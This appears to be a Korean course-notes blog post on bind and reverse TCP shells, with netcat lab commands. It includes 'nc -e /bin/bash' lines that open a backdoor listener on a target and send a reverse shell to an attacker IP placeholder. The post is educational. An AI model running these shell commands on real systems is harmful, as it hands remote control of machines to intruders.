본문 바로가기
메가IT아카데미 국기과정/리눅스와 시스템보안

[3-1] Bind&Reverse TCP

by 한님폐하 2022. 9. 12.

1. Bind TCP

  • 공격자가 타겟으로 TCP Syn를 전송하여 TCP 연결을 실시하는 공격이다.
  • 이때, 타겟은 특정 포트에 대해서 TCP 연결 대기 상태(Listen)가 되어야 한다. (Ex : 백도어)
  • 타겟이 공인 IP 환경이라면 Bind TCP 공격이 가능하지만, 사설 IP 환경이라면 공격이 불가능하다.
  • 단, 포트 포워딩(정적 NAT)이 구성된 서버 및 시스템은 공격이 가능하다.

 

1-1. Bind TCP 실습

  • 타겟에서 'nc'를 이용하여 TCP 포트 4444 연결 대기 상태로 설정한다. 
./nc -e /bin/bash -vlp 4444 &
netstat -nltp | head -2 ; netstat -nltp | grep 4444

 

  • 공격자는 TCP Syn를 전송하여 Bind TCP 연결을 실시한다.
nc [타겟IP] 4444

 

 

2. Reverse TCP

  • 타켓이 공격자쪽으로 TCP Syn를 전송하여 TCP 연결을 실시하는 공격이다.
  • 이때, 공격자는 특정 포트에 대해서 TCP 연결 대기 상태(Listen)가 되어야 한다.
  • 내부 타겟이 사설 or 공인 IP 환경에서 사용이 가능하다.

 

2-1. Reverse TCP 실습

  • 공격자에서 'nc'를 이용하여 TCP 포트 4444 연결 대기 상태로 설정한다. 
nc -nvlp 4444
netstat -nltp

 

  • 타겟이 TCP Syn를 전송하여 Reverse TCP 연결을 실시한다.
./nc -e /bin/bash [공격자 IP] 4444

 

[참고] nc(netcat)

 -n  : 도메인 이름 대신에 번호(IP 주소/포트 번호)로 출력 
 -v   : 상세 정보 출력
 -p   : 대기 포트 지정
 -l  : TCP 대기 상태 설정

 

 

 

 

'메가IT아카데미 국기과정 > 리눅스와 시스템보안' 카테고리의 다른 글

[3-3] Nmap 스캔  (0) 2022.09.12
[3-2] SetUID 특수 권한  (0) 2022.09.12
[2-14] NTP 서버  (0) 2022.09.12
[2-13] DHCP 서버  (0) 2022.09.12
[2-11] Email 서버  (0) 2022.09.12